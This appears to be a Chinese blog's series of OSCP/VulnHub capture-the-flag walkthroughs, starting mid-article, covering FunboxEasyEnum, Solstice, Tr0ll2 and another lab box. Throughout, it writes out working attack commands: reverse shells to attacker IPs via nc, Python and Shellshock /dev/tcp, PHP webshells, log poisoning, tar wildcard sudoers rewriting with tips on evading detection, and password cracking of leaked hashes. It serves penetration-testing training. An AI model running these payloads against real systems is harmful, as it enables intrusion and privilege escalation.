41| Session timeout in seconds is 300
42| Control connection is plain text
43| Data connections will be plain text
44| At session startup, client count was 3
45| vsFTPd 3.0.3 - secure, fast, stable
46|_End of status
47| ftp-anon: Anonymous FTP login allowed (FTP code 230)
48|_Can't get directory listing: TIMEOUT
4922/tcp closed ssh
50111/tcp closed rpcbind
51139/tcp closed netbios-ssn
52443/tcp closed https
53445/tcp closed microsoft-ds
542049/tcp closed nfs
5510000/tcp closed snet-sensor-mgmt
5625022/tcp open ssh OpenSSH 8.6 (protocol 2.0)
57| ssh-hostkey: 
58| 256 68:c6:05:e8:dc:f2:9a:2a:78:9b:ee:a1:ae:f6:38:1a (ECDSA)
59|_ 256 e9:89:cc:c2:17:14:f3:bc:62:21:06:4a:5e:71:80:ce (ED25519)
6033414/tcp open http Werkzeug httpd 2.2.3 (Python 3.9.13)
61|_http-server-header: Werkzeug/2.2.3 Python/3.9.13
62|_http-title: 404 Not Found
6340080/tcp open http Apache httpd 2.4.53 ((Fedora))
64| http-methods: 
65|_ Potentially risky methods: TRACE
66|_http-title: My test page
67|_http-server-header: Apache/2.4.53 (Fedora)
68Aggressive OS guesses: Linux 5.0 - 5.14 (98%), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) (98%), Linux 4.15 - 5.19 (94%), Linux 2.6.32 - 3.13 (93%), Linux 5.0 (92%), OpenWrt 22.03 (Linux 5.10) (92%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.14 (90%), Linux 4.15 (90%), Linux 2.6.32 - 3.10 (90%)
69No exact OS matches for host (test conditions non-ideal).
70Service Info: OS: Unix
71
72OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
73Nmap done: 1 IP address (1 host up) scanned in 52.68 seconds

FTP登录

Nmap扫描结果提示是可以弱密码登录FTP的，但是登录上去之后操作受限。

 1| FTP - system: 
 2| STAT: 
 3| FTP服务器状态：
 4|连接192.168.45.156 
 5|以FTP方式登录
 6| TYPE: ASCII 
 7|无会话带宽限制
 8|会话超时时间为300秒
 9|控制连接为明文
10|数据连接为明文
11|会话启动时客户端数为3 
12| vsFTPd 3.0.3安全、快速、稳定
13|_状态结束
14| FTP - Anonymous：允许匿名FTP登录（FTP代码230）
15|_无法获取目录列表：TIMEOUT

也不能用题目给的提示信息登录。

网页信息

33414端口无法直接访问，40080端口可以打开。

没有有效信息，但是再次查看的Nmap的扫描结果，确定33414 端口是打开的，那么说明网页文件可能不是index.html的形式打开就能看，要扫描一下找找隐藏文件。

扫描目录

中间VPN波动短了一次，重启后靶机地址变为192.168.203.249，攻击机地址变为192.168.45.228

1dirsearch -u http://192.168.203.249:33414 -x 302,403
2# 或
3gobuster dir -u http://192.168.203.249:33414/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e -t 25 -o scan_report.txt -k --random-agent

1"Python File Server REST API v2.5"
2"Author: Alfredo Moroder"
3"GET /help = List of the commands"
4
5"GET /info : General Info"
6"GET /help : This listing"
7"GET /file-list?dir=/tmp : List of the files"
8"POST /file-upload : Upload files"

/file-list?dir=/tmp 这个能目录遍历，能确定第一个flag文件的位置，但是不能看root下面的文件夹。

40080端口火狐页面的网站地址。

FTP的配置文件？

但是只有目录遍历是不够的，如果想要查看文件就无法直接读取。所以，下一步还是要建立一个稳定的Shell。

建立稳定Shell

文件上传

从help 页面看到提示/file-upload似乎可以上传文件，但是输入网页是无法访问的，四喜观察发现了，限定请求方式是只能POST，没有GET。

在终端使用curl来请求这个POST。

1curl -X POST http://192.168.203.249:33414/file-upload

提示没有要上传的文件，说明是要带上文件参数运行的。

1curl http://192.168.203.249:33414/file-upload -X POST -F "file=@本地文件路径"

提示需要文件名。

1echo a > a.txt # 随便写点
2curl http://192.168.203.249:33414/file-upload -X POST -F "file=@a.txt" -F "filename=aaa"

成功了，尝试别的文件行不行。发现只允许txt, pdf, png, jpg, jpeg, gif这几种格式。

如果这个靶机用的php搭建的，那么我们现在可以上传图片马，改名成a.pnp，然后在蚁剑中连接即可，或者直接上传一个php反弹的脚本。但是由于网页并没有使用PHP，所以这个方法行不通。尝试把文件传到别处，发现在/home/alfredo文件夹下上传成功。

虽然说传不了图片马，但是/home/alfredo可以读写的话，就可以传一个ssh密钥上去用于免密登录SSH。

生成密钥上传

生成密钥对
```
1ssh-keygen
```
- 作用：生成公钥/私钥对（RSA 算法）
- 生成文件：
  - id_rsa：私钥（客户端本地保存，绝不可泄露）
  - id_rsa.pub：公钥（上传到服务器）
设置私钥权限
```
1chmod 600 id_rsa
```
- 作用：设置私钥文件仅当前用户可读写
- 原因：SSH 拒绝使用权限过大的私钥文件（>600）
创建授权文件
```
1cp id_rsa.pub authorized_keys
```
- 作用：将公钥转为 SSH 认证格式
- 说明：authorized_keys文件存储所有被允许的公钥
备份授权文件
```
1cp authorized_keys authorized_keys.txt
```
- 作用：创建公钥列表备份（可选步骤）

上传密钥

1curl -i -L -X POST -H "Content-Type: multipart/form-data" -F "file=@/home/kali/Desktop/authorized_keys.txt" -F "filename=/home/alfredo/.ssh/authorized_keys" http://192.168.203.249:33414/file-upload
2
3curl http://192.168.203.249:33414/file-upload -X POST -F "file=@authorized_keys.txt" -F "filename=/home/alfredo/.ssh/authorized_keys"

将密钥传到服务器后就可以用密钥登录了。

使用密钥登录
```
1ssh alfredo@192.168.203.249 -i id_rsa -p 25022
```
- -i id_rsa：指定私钥文件路径
- -p 25022：指定非标准 SSH 端口

发现第一个Flag。

提权root

进入终端后发现不能sudo -l，这里其实题目给了提示，Alfredo的密码是DriveMailLens774。但是这样就没意思了。还是尽量自己找其他能进root的方式。

上传小豌豆

老样子还是掏出小豌豆一顿梭哈。

1wget https://ghfast.top/https://github.com/peass-ng/PEASS-ng/releases/download/20250701-bdcab634/linpeas.sh

这里提示靶机的网络环境似乎是找不到github，问题不大，可以在本机下载后再用scp上传即可，或者在本机开启短暂的http网页，靶机请求下载即可。

使用开启网页下载的方式无法下载，换tmp目录也是下载很慢。

问题不大，还有Plan B，用SCP方式上传。

1scp -i id_rsa -P 25022 linpeas.sh alfredo@192.168.203.249:/home/alfredo

内网信息收集

扫描发现日志文件中存在一个用root身份执行的备份脚本。

1*/1 * * * * root /usr/local/bin/backup-flask.sh

pkexec 提权尝试

又可以用这个命令一键提权，但是提权失败了，因为 alfredo账户没有sudu权限，可执行命令里面页没有pkexec。

可以执行的命令。

发现alfredo账户原本的密钥，这里可以复制下来，然后悄咪咪删除我们传上去的临时密钥，以后用本尊密钥登录，神不知鬼不觉的。

1# 从服务器下载文件
2scp -i id_rsa -P 25022 alfredo@192.168.203.249:[远程文件] [本地路径]

后面没有发现有用的信息了，所以还是回到之前发现定时任务中。看一下这个命令的权限，我们能不能直接修改，看看他写了什么。

1ls /usr/local/bin/backup-flask.sh -al
2cat /usr/local/bin/backup-flask.sh

可以发现，对backup-flask.sh文件，无法直接修改内容，因为alfredo账户对这个文件只有读和执行权限。而backup-flask.sh脚本完成了三件事：

修改环境变量：

export PATH="/home/alfredo/restapi:$PATH"

把 /home/alfredo/restapi目录添加到系统命令搜索路径的最前面，后续执行命令时，系统会优先在这个目录中查找可执行文件
切换工作目录：

cd /home/alfredo/restapi

进入 restapi 应用程序所在的目录
打包文件：

tar czf /tmp/flask.tar.gz *

将当前目录所有文件（*）压缩成 gzip 格式的 tar 包 flask.tar.gz存档，保存在 /tmp目录下，c表示创建新压缩包，z表示使用 gzip 压缩，f指定输出文件名。

能利用的命令只有tar命令，另外两个命令在https://gtfobins.github.io/#搜不到相应的提权用法。

https://gtfobins.github.io/gtfobins/tar/，提权的具体原理见文末Tar提权详解

Tar提权

 1cd /home/alfredo/restapi
 2cat > payload.sh
 3
 4echo 'alfredo ALL=(root) NOPASSWD: ALL' > /etc/sudoers
 5# 上面是开放所有权限，动作大，实际渗透中容易被发现
 6# 下面这个命令是只开放pkexec的无密码sudo执行权限，一般管理员不仔细查的话是发现不了的
 7echo 'alfredo ALL=(root) NOPASSWD: /usr/bin/pkexec' > /etc/sudoers
 8# 输入完按 Ctrl D结束即可保存
 9
10chmod +x payload.sh
11echo "" > '--checkpoint=1' 
12echo "" > '--checkpoint-action=exec=sh payload.sh'
13
14# 等待打包命令执行
15# 用之前执行失败的提权方式再次提权
16sudo pkexec /bin/sh # bash也行
17sudo pkexec /bin/bash
18# 如果开放的是全权限，直接进入即可。
19sudo -l 
20sudo /bin/bash

知识点整理

🔑 SSH 密钥认证全流程（重要文件位置）：

文件	位置	角色	权限要求
私钥 `id_rsa`	客户端（您的电脑）	认证身份	`chmod 600` （仅用户读写）
公钥 `id_rsa.pub`	服务端 `~/.ssh/authorized_keys`	授权认证	自动处理
授权文件 `authorized_keys`	服务端 `~/.ssh/`目录	公钥白名单	`chmod 600`

⚠️ 安全注意事项：

私钥保护
- 私钥相当于密码，需妥善保管
- 禁用私钥：服务器上删除 authorized_keys中对应公钥

服务器文件权限

1chmod 700 ~/.ssh # 目录权限
2chmod 600 ~/.ssh/authorized_keys # 授权文件权限

增强安全性

1ssh-keygen -o -a 100 -t ed25519 # 使用更安全的ED25519算法

💡 密钥认证比密码更安全的原因：抗暴力破解、支持双因素认证（私钥+密码）、可撤销性强。

Tar提权详解

1tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

这个命令利用了 tar命令的检查点功能来执行任意命令，最终会启动一个交互式的 shell（/bin/sh）。下面是详细解释：

命令分解：

1tar -cf /dev/null /dev/null # 基础归档操作
2--checkpoint=1 # 设置检查点间隔
3--checkpoint-action=exec=/bin/sh # 在每个检查点执行指定命令

逐步解释：

归档操作：
```
1tar -cf /dev/null /dev/null
```
- -c：创建新归档
- -f /dev/null：指定归档文件为系统空设备（写入的内容会被丢弃）
- /dev/null：被归档的文件（同样是空设备）
- 效果：实际上不产生任何文件，只是一个空操作
检查点设置：
```
1--checkpoint=1
```
- 每处理 1 个文件 就触发一次检查点（默认是每 10 个记录触发）
检查点动作：
```
1--checkpoint-action=exec=/bin/sh
```
- 在每次检查点触发时执行 /bin/sh
- 效果：当 tar处理第一个（也是唯一一个）文件（/dev/null）时立即启动一个 shell，这个Shell用哪个角色执行就是那个角色的权限。

⚠️ 安全风险：

这是著名的 tar 提权技术，常用于：

绕过受限环境获取完整 shell
当用户有权限执行 tar 时进行权限提升
反弹 shell 的技术变种

实际效果：

该命令会立即启动一个 交互式 shell（/bin/sh）
因为归档目标是 /dev/null，所以不生成任何实际文件
完整命令会在当前用户上下文执行 /bin/sh

典型攻击场景：

SUID 提权：

1find / -perm -u=s -type f 2>/dev/null | grep tar
2# 如果返回 /bin/tar，则运行：
3/bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

sudo 权限提升：

1sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

容器逃逸：

在 Docker 容器内运行可直接获得宿主机 shell（若容器以特权模式运行）

Tar提权命令配合*通配符的用法

在本地kali中模拟靶机环境的restapi文件夹，文件夹下原本存在33414端口上的服务，主要是app.py和 main.py两个文件。

当backup-flask.sh执行打包命令时，正常情况下，打包的是这两个py文件。

tar czf /tmp/flask.tar.gz *

但是当在文件夹下输入这两个命令，创建了两个空文件，实际上这两个文件里什么都没写，重要的是文件名，文件名就是提权的参数。

1echo "" > '--checkpoint=1' 
2echo "" > '--checkpoint-action=exec=sh payload.sh'

那么当运行 tar czf /tmp/flask.tar.gz *这个命令时，通配符星号（*）意思是选取了文件夹下的所有文件，通配符星号（*）认为’–checkpoint=1’ 和’–checkpoint-action=exec=sh payload.sh’是两个文件，所以加入到命令中，此时通配符星号（*）代表的是：

1app.py flask.tar.gz main.py payload.sh '--checkpoint=1' '--checkpoint-action=exec=sh payload.sh'

但是当执行tar命令时，tar会认为后面两个是参数，不是文件名。所以执行tar时就通过文件名玩文字游戏，把提权参数写成文件名，巧妙的通过通配符送入root的定时任务，让其代劳。

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

OSCP官方靶场-FunboxEasyEnum WP

Wed, 16 Jul 2025 23:45:31 +0000

关注泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

官方网页打开或下载靶场文件

https://www.vulnhub.com/entry/funbox-easyenum,565/

快速连接OffSec靶场的小方法

信息收集

1# 靶机地址
2192.168.151.132
3# Kali攻击机在VPN中的地址
4192.168.45.156

测试靶场网络连接速度

1ping 192.168.151.132 -c 10 | grep rtt

使用【踩坑总结】丝滑连接OffSec官方VPN的方法中的方法测试最佳MTU值并自动设置。

扫描端口

1ports=$(sudo nmap -p- --min-rate=5000 -Pn 192.168.151.132 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
2echo $ports
3sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.151.132
4sudo nmap --script=vuln -p$ports -Pn 192.168.151.132

扫描结果如下：

 1┌──(kali㉿kali)-[~/Desktop]
 2└─$ sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.151.132
 3Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-16 03:48 EDT
 4Nmap scan report for bogon (192.168.151.132)
 5Host is up (0.096s latency).
 6
 7PORT STATE SERVICE VERSION
 822/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
 9| ssh-hostkey: 
10| 2048 9c:52:32:5b:8b:f6:38:c7:7f:a1:b7:04:85:49:54:f3 (RSA)
11| 256 d6:13:56:06:15:36:24:ad:65:5e:7a:a1:8c:e5:64:f4 (ECDSA)
12|_ 256 1b:a9:f3:5a:d0:51:83:18:3a:23:dd:c4:a9:be:59:f0 (ED25519)
1380/tcp open http Apache httpd 2.4.29 ((Ubuntu))
14|_http-title: Apache2 Ubuntu Default Page: It works
15|_http-server-header: Apache/2.4.29 (Ubuntu)
16Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
17Device type: general purpose
18Running: Linux 4.X|5.X
19OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
20OS details: Linux 4.15 - 5.19, Linux 5.0 - 5.14
21Network Distance: 4 hops
22Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
23
24OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
25Nmap done: 1 IP address (1 host up) scanned in 15.81 seconds

 1┌──(kali㉿kali)-[~/Desktop]
 2└─$ sudo nmap --script=vuln -p$ports -Pn 192.168.151.132
 3Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-16 03:53 EDT
 4Nmap scan report for bogon (192.168.151.132)
 5Host is up (0.11s latency).
 6
 7PORT STATE SERVICE
 822/tcp open ssh
 980/tcp open http
10|_http-dombased-xss: Couldn't find any DOM based XSS.
11|_http-csrf: Couldn't find any CSRF vulnerabilities.
12| http-slowloris-check: 
13| VULNERABLE:
14| Slowloris DOS attack
15| State: LIKELY VULNERABLE
16| IDs: CVE:CVE-2007-6750
17| Slowloris tries to keep many connections to the target web server open and hold
18| them open as long as possible. It accomplishes this by opening connections to
19| the target web server and sending a partial request. By doing so, it starves
20| the http server's resources causing Denial Of Service.
21| 
22| Disclosure date: 2009-09-17
23| References:
24| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
25|_ http://ha.ckers.org/slowloris/
26|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
27| http-enum: 
28| /robots.txt: Robots file
29|_ /phpmyadmin/: phpMyAdmin

打开80端口如图，是一个Apache2默认配置页面，如果说管理员没有配置网站访问权限的话，应该还能使用目录扫描发现其他默认目录。

扫描目录

字典目录地址如下，一般选择Medium字典即可。

1cd /usr/share/wordlists/dirbuster
2ls

1sudo gobuster dir \
2 -u http://192.168.151.132/ \  # 目标 URL
3 --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \  # 使用中等规模字典
4 -e \  # 显示完整 URL
5 -t 20 \  # 20 线程加速扫描
6 -x php # 额外探测 .php 文件

发现存在新的页面：

1http://192.168.151.132/mini.php

反弹Shell

这个靶机是个奖励关，是一个文件上传的练手靶机。现实情况中，基本没有这么傻的服务器。练手也要好好练习，这是一个典型的PHP文件上传还能反弹PHP代码的靶机，我们可以用这个靶机练习多种反弹Shell的方式。

方法一：修改Mini.php，注入反弹

选择Mini.php的选项，选择 Edit 编辑，点击执行按钮。

可以修改Mini.php文件的内容，额外的发现是option&path=/var/www/html似乎可以用于遍历目录，但是访问其他目录没有列出文件，似乎是没有权限。

还是回到原来的思路，修改php文件，加入一句话木马。

1<?=`$_GET[0]`?>

这里可以发现第一个flag了。网页形式的命令实在是不好操作，把 Mini.php改一个反弹的命令。初次尝试用下面的命令，弹回了，但是无法有交互的终端，如果带上-e或者-c /bin/bash参数的话，就无法弹回来了。

1http://192.168.151.132/mini.php?0=nc%20192.168.45.156%204777

方法二：上传反弹php文件，访问反弹

查找PHP反弹shell的脚本

1find / -name 'php-reverse*' 2>/dev/null 
2---
3┌──(kali㉿kali)-[~/Desktop]
4└─$ find / -name 'php-reverse*' 2>/dev/null 
5/usr/share/laudanum/php/php-reverse-shell.php
6/usr/share/laudanum/wordpress/templates/php-reverse-shell.php

复制到本地，修改然后再网页中上传。

可以发现权限是只读的，该做全员可读可写可执行。

访问此链接，反弹成功。

提权Root

从一开始的目录扫描和Nmap的结果中我们还漏了一个phpmyadmin的数据库页面，打开发现确实是存在。但是密码不是默认密码。

内网信息收集

继续从建立的Shell探索。在/tmp目录下载linpeas.sh脚本，来查找系统下有什么可疑文件可以利用。

1cd /tmp
2wget https://github.com/peass-ng/PEASS-ng/releases/download/20250701-bdcab634/linpeas.sh
3chmod +x linpeas.sh
4./linpeas.sh

找到个3306端口开放，应该是phpmyadmin的数据库端口。53作为DNS的服务器。

Pkexec似乎可以用作提权。

密码文件里，这个似乎可以爆下哈希。

1oracle:$1$|O@GOeN\$PGb9VNu29e9s6dMNJKH/R0:1004:1004:,,,:/home/oracle:/bin/bash

Karla用户似乎是管理员角色的账户，他的权限比其他人高，仅次于root。

发现数据库的配置文件。

其他有趣的文件，后来看了不知道是干什么的。

数据库密码也找到了。

 1╔══════════╣ Readable files belonging to root and readable by me but not world readable
 2-rw-r----- 1 root www-data 525 Sep 18 2020 /etc/phpmyadmin/config-db.php
 3-rw-r----- 1 root www-data 8 Sep 18 2020 /etc/phpmyadmin/htpasswd.setup
 4-rw-r----- 1 root www-data 68 Sep 18 2020 /var/lib/phpmyadmin/blowfish_secret.inc.php
 5-rw-r----- 1 root www-data 0 Sep 18 2020 /var/lib/phpmyadmin/config.inc.php
 6╔══════════╣ Searching passwords in config PHP files
 7/etc/phpmyadmin/config-db.php:$dbpass='tgbzhnujm!';
 8/etc/phpmyadmin/config-db.php:$dbuser='phpmyadmin';
 9/etc/phpmyadmin/config.inc.php: // $cfg['Servers'][$i]['AllowNoPassword'] = TRUE;
10/etc/phpmyadmin/config.inc.php:// $cfg['Servers'][$i]['AllowNoPassword'] = TRUE;
11/usr/share/phpmyadmin/config.sample.inc.php:$cfg['Servers'][$i]['AllowNoPassword'] = false;
12/usr/share/phpmyadmin/libraries/config.default.php:$cfg['Servers'][$i]['AllowNoPassword'] = false;
13/usr/share/phpmyadmin/libraries/config.default.php:$cfg['Servers'][$i]['nopassword'] = false;
14/usr/share/phpmyadmin/libraries/config.default.php:$cfg['ShowChgPassword'] = true;
15
16╔══════════╣ Modified interesting files in the last 5mins (limit 100)
17/var/log/auth.log
18/var/log/journal/7eb907a1e82c4e37b03c20faa67cf884/system.journal
19/var/log/syslog

使用小豌豆找到的密码，尝试登录phpmyadmin后台成功。所以凭证就是

1phpmyadmin
2tgbzhnujm!

方法一：进入Karla sudo su快捷提权（瞎蒙）

从前面收集的信息来看，Karla推测是管理员的角色，而管理员一般就是维护数据库的人，极有可能重复使用同一个密码。尝试切换到Karla账户，输入数据库的密码蒙一下：tgbzhnujm!成功进入。

Karla确实是管理员角色，sudo -l发现它可以执行所有命令，所以直接sudo su就能进root了。

方法二：进入Karla用Pkexec提权

内网信息收集中的Pkexec似乎可以用作提权，查询https://gtfobins.github.io/gtfobins/pkexec/提权命令即可。www-data账户不可提权，因为不知道www-data的密码。karla账户可以，Oracle账户不行。

方法三：爆破Goat，用Mysql提权

内网信息手机中发现，Goat账户是可以SSH登录的，而官网题目也提示了goat。所以，直接尝试用hydra爆破一下ssh登录。

1hydra -l goat -P /usr/share/wordlists/rockyou.txt ssh://192.168.151.132
2ssh goat@192.168.151.132
3密码也是goat

也可以不用爆，题目已经给了提示。

登录后发现mysql命令可以无密码提权，搜索https://gtfobins.github.io/gtfobins/mysql/命令输入即可提权。

其他玩法

Oracle账户

之前发现有Oracle账户的哈希，尝试爆破。

1cat > orcalhash 
2# 粘贴下面的内容，按 Ctrl D结束
3oracle:$1$|O@GOeN\$PGb9VNu29e9s6dMNJKH/R0:1004:1004:,,,:/home/oracle:/bin/bash
4
5cd /usr/share/wordlists 
6sudo gzip -d rockyou.txt.gz

1 hashcat orcalhash /usr/share/wordlists/rockyou.txt

爆破密码得到是hiphop

可以直接从www-data账户直接su oracle进入账户，但是好像没啥有用的。

Harry账户

在Karla账户或root账户下执行sudo mysql进入数据库。

1show databases;
2use db1
3show tables;
4select * from users;

解码一下得到密码是123456

但是好像也没啥用。

遗憾：没找到Sllay的密码。

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

OSCP官方靶场-Solstice WP

Thu, 10 Jul 2025 20:11:15 +0000

官方网页打开或靶场下载链接

https://www.vulnhub.com/entry/sunset-solstice,499/

信息收集

靶机地址：

1192.168.149.72

扫描开放的端口，使用VPN扫描又挂代理的话，有一定机率扫漏了。考试时候建议用官方的My kali先扫一遍，是最快最全的。

1ports=$(sudo nmap -p- --min-rate=10000 -Pn 192.168.149.72 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
2echo $ports
3sudo nmap --script=vuln -p$ports -Pn 192.168.149.72
4sudo nmap -sU --min-rate 10000 -p- -Pn 192.168.149.72

再次细致的扫描端口上的组件和版本信息，这里VPN断了，所以没有扫除具体信息。从之前用官方的My Kali扫描的信息能获得一些端口的信息。

1sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.149.72

从之前的扫描信息中看，除了80端口，还有8593端口也开放，一个一个点开了看看有什么。

文件包含

从8593端口的链接方式猜测似乎有文件包含漏洞

1../../../../../../../../../var/log/apache2/access.log

log文件投毒

可以看到log文件中记录了请求头，我们下一步在请求头中写入一句话木马，就可以把log污染成马。

到这里链接断了，换了重启靶机后IP更换为 192.168.196.72，用Win本机的Burp抓不上包改用命令行注入

1echo -e "GET / HTTP/1.1\r\nHost: 192.168.51.72\r\nUser-Agent: <?php system(\$_GET['cmd']); ?>\r\nConnection: close\r\n\r\n" | nc 192.168.51.72 80
2或者
3nc 192.168.43.127 80
4回车输入GET /<?php system($_GET['cmd']); ?> HTTP/1.1

或者也可以用浏览器工具，但是这个似乎不成功。

反弹Shell

然后把命令换成反弹shell的命令，这个本机的地址

1python3%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%22192.168.45.180%22%2C4777%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3Bos.dup2%28s.fileno%28%29%2C2%29%3Bimport%20pty%3B%20pty.spawn%28%22%2Fbin%2Fbash%22%29%27

提权

输入以下命令查找有root权限的文件和进程

1ps -aux | grep root

可以发现在/var/tmp/sv/目录下似乎有一些奇特的东西

这是一个php文件，是网页主页的文件，从命令来看，他开在57端口。下一步的思路就是，把这个php改成能提权弹shell的木马。然后访问57端口就能激活这个一句话木马。

1echo "<?php system('nc 192.168.45.180 4445 -e /bin/bash')?>" >> index.php

57这个端口没有对外开放，所以我们只能在shell上弹一下。

1.\nc.exe -lvnp 4445
2curl 127.0.0.1:57/index.php

补充知识点

/usr/sbin/nologin和/bin/bash的区别

特性	/usr/sbin/nologin	/bin/bash
基本用途	禁止交互式登录	允许交互式命令行操作
用户类型	系统服务账户（如 mysql, www-data）	普通用户或管理员账户
登录行为	▶ 拒绝登录 ▶ 显示预设提示信息（默认或自定义）	▶ 允许登录 ▶ 启动 Bash 交互环境
Shell 功能	无执行能力（仅返回错误信息）	完整命令行解释器（支持脚本/命令）
自定义提示	支持（通过 `/etc/nologin.txt` 文件）	通过 `~/.bashrc` 自定义
典型应用场景	守护进程账户 FTP虚拟用户安全锁账户	普通用户登录管理员维护开发环境
检查命令	`grep nologin /etc/passwd`	`grep bash /etc/passwd`

详细说明

/usr/sbin/nologin
- 安全隔离机制：阻止账户获得任何交互式 Shell
- 工作流程：
  1. 用户尝试登录（SSH/FTP/控制台）
  2. 系统显示拒绝信息（默认："This account is currently not available."）
  3. 立即终止会话
- 自定义提示：
```
echo "管理员专用账户，禁止登录" > /etc/nologin.txt
```
- 典型配置示例
  
  （/etc/passwd）：
```
ftpuser:x:1001:1001::/var/ftp:/usr/sbin/nologin
```
/bin/bash
- 全功能交互环境：
  - 支持命令执行、脚本运行、作业控制
  - 配置文件：~/.bashrc, ~/.profile
- 开发/运维能力：
```
# 允许运行所有命令
$ vim /etc/config
$ systemctl restart service
```

⚠️ 重要安全建议

系统服务账户 必须使用 nologin（如 MySQL/Nginx 账户）
普通用户 仅在必要时应获得 bash 权限
临时锁定账户：usermod -s /usr/sbin/nologin username
解锁账户：usermod -s /bin/bash username

Day15 Tr0ll2 靶场WP

Tue, 20 May 2025 14:30:15 +0000

关注 泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

Tr0ll: 2

靶场地址：https://www.vulnhub.com/entry/tr0ll-2,107/

信息收集

1sudo arp-scan -l
2nmap -sS -sV -A -T5 -p- 172.168.169.139

检查网页源码发现有注释信息，写着作者是Tr0ll，用vim编辑的这个网页，我们就能推测，某个功能可能是ssh，可能是ftp的用户名应该有Tr0ll，之后的收集中要注意找密码。

打开看到一个滑稽的图片，看到web服务器是apache就想到应该要查一下网页的目录。

1dirb http://172.168.169.139/

看到有个robots.txt是机器人爬虫的协议，越不让看什么越要看什么。

我们把所有目录都翻一遍可以看到出了以上几个目录有图片，其他几个目录都没有东西。这四个目录是：

1http://172.168.169.139/noob/
2http://172.168.169.139/keep_trying/
3http://172.168.169.139/dont_bother/
4http://172.168.169.139/ok_this_is_it/

图片隐写信息

检查网页源代码都没有什么有用信息，那么我们把目光放到图片上来，图片可能又隐写信息。在kali中下载这些图片，kali会自动重命名。可以看到第3次下载的图片大小何其他几个不同。

1wget http://172.168.169.139/noob/cat_the_troll.jpg
2wget http://172.168.169.139/keep_trying/cat_the_troll.jpg
3wget http://172.168.169.139/dont_bother/cat_the_troll.jpg
4wget http://172.168.169.139/ok_this_is_it/cat_the_troll.jpg

1strings cat_the_troll.jpg.3

base64解码

可以看到第3哥图片比其他几个图片在末尾隐藏了一段话，其中y0ur_self极有可能是目录。打开看到如下文件，应该是base64加密。

这个文件很想一个爆破后留下的，推测密码应该在其中，用base64解码后再用hydra爆破尝试一下。

1base64 -d answer.txt > pass.txt
2hydra -l Tr0ll -P pass.txt 172.168.169.139 ssh -v
3hydra -l Tr0ll -P pass.txt 172.168.169.139 ftp -v

默认密码尝试ftp登录

但是爆破不成功，这个可能是靶机作者给我们的误导，所以我们换个思路，尝试默认弱口令登录。尝试ftp登录后发现提示用户名Tr0ll，尝试用户名何密码都是这个后成功登录。发现有一个zip文件，下载后查看。

ZIP密码爆破

解压压缩包发现要密码，所以之前的answer.txt并不是登录密码，而是压缩包的密码。

用一下两个命令都可以爆破压缩包密码。

1zip2john lmao.zip > lmao.txt && john --wordlist=pass.txt lmao.txt 
2fcrackzip -u -D -p pass.txt lmao.zip

解压后似乎是一个密钥文件，有密钥的话我们就可以ssh登录了。

SSH密钥登录

直接登录时不行的

1ssh -i noob noob@172.168.169.139

用以下命令查看为什么报错

1ssh -vvv -i noob noob@172.168.169.139
2
3---
4OpenSSH_9.9p2 Debian-2, OpenSSL 3.5.0 8 Apr 2025

可能因为版本太老了，我尝试 强制客户端使用旧版签名算法在 SSH 命令中指定兼容旧服务器的签名算法：

1ssh -i noob noob@172.168.169.139 -o PubkeyAcceptedKeyTypes=+ssh-rsa

也不行。查资料发现可以利用shellcode漏洞。

CVE-2014-6271 是著名的 Shellshock 漏洞（又称 “Bash 破壳漏洞”），它影响了广泛使用的 Unix/Linux 系统中的 Bash 解释器。该漏洞允许攻击者通过环境变量注入恶意代码，从而远程执行任意命令。以下是漏洞利用的详细方法：

SSH强制命令

若目标允许通过SSH公钥认证并配置了强制命令（如 command="example"）：

1ssh -i id_rsa user@target '() { :;}; /bin/bash -i >& /dev/tcp/攻击者IP/4444 0>&1'

1ssh -i noob -o PubkeyAcceptedAlgorithms=+ssh-rsa -o HostKeyAlgorithms=+ssh-rsa noob@172.168.169.139 '() { :;}; cat /etc/passwd'
